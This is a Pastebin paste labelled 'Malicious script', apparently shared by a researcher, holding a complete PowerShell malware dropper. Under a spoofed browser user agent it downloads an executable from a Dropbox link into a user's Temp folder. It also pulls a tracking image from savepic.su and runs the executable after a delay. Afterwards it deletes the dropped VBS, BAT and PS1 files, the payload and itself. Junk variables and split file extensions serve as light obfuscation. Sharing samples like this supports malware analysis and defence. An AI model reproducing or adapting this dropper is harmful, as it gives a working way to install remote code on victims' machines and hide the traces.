dynamoo

Malicious script

Apr 16th, 2015
350
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $aisjd = '123';
  2. $stat = 'http://savepic.su/5540444.png';
  3. $ggtt = 'https://www.dropbox.com/s/y5iffq6bp8m0drn/lo.gif?dl=1';
  4. $pths = 'C:\Users\PSPUBWS\AppData\Local\Temp\';
  5. $wehs = '17055';
  6. $nnm = '8';
  7. $down = New-Object System.Net.WebClient;
  8. $dasdw='123';
  9. $file = $pths+$nnm+'.exe';
  10. $statfile = $pths+'444.jpg';
  11. $down.headers['User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  12. $dasdw='123';
  13. $down.DownloadFile($ggtt,$file);
  14. $down.DownloadFile($stat,$statfile);
  15. $asdw='123';
  16. $ScriptDir = $MyInvocation.ScriptName;
  17. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  18. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'j'+'pg';
  19. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  20. $psFilePath = $pths+$wehs+'.'+'p'+'s'+'1';
  21. Start-Sleep -s 15;
  22. cmd.exe /c $file;
  23. $file1 = gci $vbsFilePath -Force
  24. $file2 = gci $btFilePath -Force
  25. $ajsi ='412';
  26. $file3 = gci $psFilePath -Force
  27. $kasldds = $vbsFilePath
  28. If (Test-Path $kasldds){ Remove-Item $kasldds }
  29. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  30. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  31. $jsdhyfueh2hds = 'asdghyg23d jashdhsagdhasghdhgas';
  32. If (Test-Path $file){ Remove-Item $file }
  33. Remove-Item $MyINvocation.InvocationName
RAW Paste Data